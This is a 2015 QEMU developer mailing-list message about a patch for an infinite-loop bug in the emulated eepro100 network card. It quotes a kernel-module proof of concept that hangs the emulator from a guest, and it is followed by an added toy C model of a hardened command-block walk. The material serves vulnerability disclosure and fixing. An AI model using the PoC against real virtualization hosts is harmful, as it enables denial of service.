Message-ID: <564ECFF9.2090803@weilnetz.de>
Date: Fri, 20 Nov 2015 08:47:05 +0100
From: Stefan Weil
To: Qinghao Tang, P J P
Cc: Paolo Bonzini, Jason Wang, QEMU Developers, Peter Maydell
Subject: Re: [Qemu-devel] [PATCH] eepro100: prevent an infinite loop over same command block
References: <5620F082.5040007@redhat.com> <5625AEE0.7070908@redhat.com> <56397C1D.6070304@redhat.com>

On 20 Nov 2015 at 07:29, Qinghao Tang wrote:
> I think the patch can solve this vulnerability.
> I confirm that the loop exists; the PoC code can prove that.
>
> #include <linux/init.h>
> #include <linux/module.h>
> #include <linux/kernel.h>
> #include <linux/slab.h>     /* kmalloc */
> #include <asm/io.h>
>
> MODULE_LICENSE("GPL");
>
> static int hello_init(void)
> {
>     void *pvirt;
>     phys_addr_t pphy;
>
>     pvirt = kmalloc(0x100, GFP_KERNEL);
>     if (!pvirt)
>         return -ENOMEM;
>     memset(pvirt, 0, 0x100);      /* control the fields of the eepro100_tx_t struct */
>     pphy = virt_to_phys(pvirt);   /* get the physical address */
>     printk(KERN_ALERT "%p\n", pvirt);
>     printk(KERN_ALERT "%pa\n", &pphy);
>     outl(pphy, 0xc004);           /* write the address */
>     outw(0x0060, 0xc002);
>     outl(0, 0xc004);              /* write the offset */
>     outw(0x0010, 0xc002);         /* enter the action_command function */
>
>     return 0;
> }
>
> static void hello_exit(void)
> {
>     printk(KERN_ALERT "goodbye,kernel\n");
> }
>
> module_init(hello_init);
> module_exit(hello_exit);
> MODULE_AUTHOR("qinghao tang");
> MODULE_DESCRIPTION("poc for eepro100 infinite loop vulnerability\n");
>
> 2015-11-20 14:10 GMT+08:00 P J P <ppandit@redhat.com>:
> > Hello Qinghao,
> >
> > +-- On Fri, 20 Nov 2015, Qinghao Tang wrote --+
> > | Currently what problem do you have? Perhaps I could provide more support.
> >
> > Could you please confirm if the proposed patch here fixes the issue?
> > Secondly, there is uncertainty whether the CB loop, as Jason mentioned
> > earlier, is possible.
> >
> > | And please give this vulnerability a CVE id.
> >
> > Yes, I will, as soon as the patch is ready for upstream.
> >
> > Thank you.
> > --
> > Prasad J Pandit / Red Hat Product Security Team
> > 47AF CE69 3A90 54AA 9045 1053 DD13 3D32 FE5B 041F

Thanks for this example. Could you please try whether the patch
which I have just sent fixes the problem for you?

And please CC me on any e-mails regarding eepro100.

Stefan
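The PoC in the thread drives the emulated NIC's command unit (CU) onto an all-zero command block whose link offset points back at itself, so a walk that blindly follows the link never terminates. The defender's fix pattern for any DMA-driven list walk in a device model is the same: bounds-check every address before touching it, refuse to revisit a block within one CU start, and cap the total number of blocks processed. The following is an added example written for this note; it is not QEMU's eepro100 code and not from any participant in the thread. The CB layout (16-bit status, 16-bit command, 32-bit link offset), the EL/S command bits, the status bits, the memory size and the `TOY_*` and `demo()` names are all assumptions of the toy model, and the guest memory it walks is constructed inline.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy command block (CB): 16-bit status, 16-bit command, 32-bit link offset.
 * The layout and bit positions are assumptions modelled on the 8255x CB
 * header; none of this is QEMU's eepro100 code. */
typedef struct {
    uint16_t status;
    uint16_t command;
    uint32_t link;              /* offset of the next CB from the CU base */
} toy_cb_t;

#define TOY_CMD_EL     0x8000u  /* end of list: stop after this CB */
#define TOY_CMD_S      0x4000u  /* suspend after this CB */
#define TOY_STATUS_C   0x8000u  /* CB complete */
#define TOY_STATUS_OK  0x2000u  /* CB completed without error */
#define TOY_MEM_SIZE   0x1000u  /* size of the constructed guest memory */
#define TOY_MAX_CBS    64u      /* hard cap on CBs processed per CU start */

typedef enum {
    WALK_END_OF_LIST,           /* stopped on an EL block (normal) */
    WALK_SUSPENDED,             /* stopped on an S block (normal) */
    WALK_LOOP_DETECTED,         /* a link pointed back at a visited CB */
    WALK_CAP_HIT,               /* more CBs than the device will run */
    WALK_BAD_ADDR               /* a CB address fell outside guest memory */
} walk_result_t;

typedef struct {
    walk_result_t result;
    unsigned processed;         /* CBs marked complete before stopping */
} toy_outcome_t;

/* Hardened walk: bounds-check every DMA address, refuse to revisit a CB
 * within one CU start, and cap the total number of CBs processed. */
static toy_outcome_t toy_cu_start(uint8_t *mem, size_t mem_size,
                                  uint32_t cu_base, uint32_t cu_offset)
{
    uint32_t visited[TOY_MAX_CBS];
    toy_outcome_t out = { WALK_END_OF_LIST, 0 };
    for (;;) {
        uint64_t addr = (uint64_t)cu_base + cu_offset;  /* no 32-bit wrap */
        if (addr + sizeof(toy_cb_t) > mem_size) {
            out.result = WALK_BAD_ADDR;
            return out;
        }
        for (unsigned i = 0; i < out.processed; i++) {
            if (visited[i] == (uint32_t)addr) {         /* seen before: cycle */
                out.result = WALK_LOOP_DETECTED;
                return out;
            }
        }
        if (out.processed >= TOY_MAX_CBS) {
            out.result = WALK_CAP_HIT;
            return out;
        }
        visited[out.processed++] = (uint32_t)addr;
        toy_cb_t cb;
        memcpy(&cb, mem + addr, sizeof cb);             /* "DMA read" of the CB */
        cb.status |= TOY_STATUS_C | TOY_STATUS_OK;       /* "execute" it */
        memcpy(mem + addr, &cb, sizeof cb);             /* write status back */
        if (cb.command & TOY_CMD_EL) { out.result = WALK_END_OF_LIST; return out; }
        if (cb.command & TOY_CMD_S)  { out.result = WALK_SUSPENDED;   return out; }
        cu_offset = cb.link;                            /* follow the link */
    }
}

/* Scenario helper: write one CB into the constructed guest memory. */
static void toy_put_cb(uint8_t *mem, uint32_t at, uint16_t command, uint32_t link)
{
    toy_cb_t cb = { 0, command, link };
    memcpy(mem + at, &cb, sizeof cb);
}

/* Constructed scenarios, selected by name; an unknown name runs "self-loop". */
toy_outcome_t demo(const char *name)
{
    uint8_t mem[TOY_MEM_SIZE] = { 0 };  /* constructed guest memory, all zero */
    uint32_t base = 0;
    if (!strcmp(name, "clean-chain")) {
        base = 0x100;                   /* three CBs 0x40 apart, EL on the last */
        toy_put_cb(mem, 0x100, 0, 0x40);
        toy_put_cb(mem, 0x140, 0, 0x80);
        toy_put_cb(mem, 0x180, TOY_CMD_EL, 0);
    } else if (!strcmp(name, "two-cycle")) {
        base = 0x200;                   /* two CBs that link to each other */
        toy_put_cb(mem, 0x200, 0, 0x40);
        toy_put_cb(mem, 0x240, 0, 0x00);
    } else if (!strcmp(name, "bad-link")) {
        base = 0x300;                   /* link that leaves guest memory */
        toy_put_cb(mem, 0x300, 0, 0xFFFF0000u);
    }
    /* "self-loop": all-zero memory, base 0, offset 0; the CB at 0 links to 0 */
    return toy_cu_start(mem, sizeof mem, base, 0);
}
```

The "self-loop" scenario is the shape of the PoC above: the walk processes the block at offset 0 once and then stops with `WALK_LOOP_DETECTED` instead of spinning. The visited-list check is deliberately O(n) in the cap, which is fine for a small hard limit; for a device that legitimately processes long lists, the cap alone (returning `WALK_CAP_HIT`) is the cheaper guarantee of termination and the cycle check becomes a diagnostic.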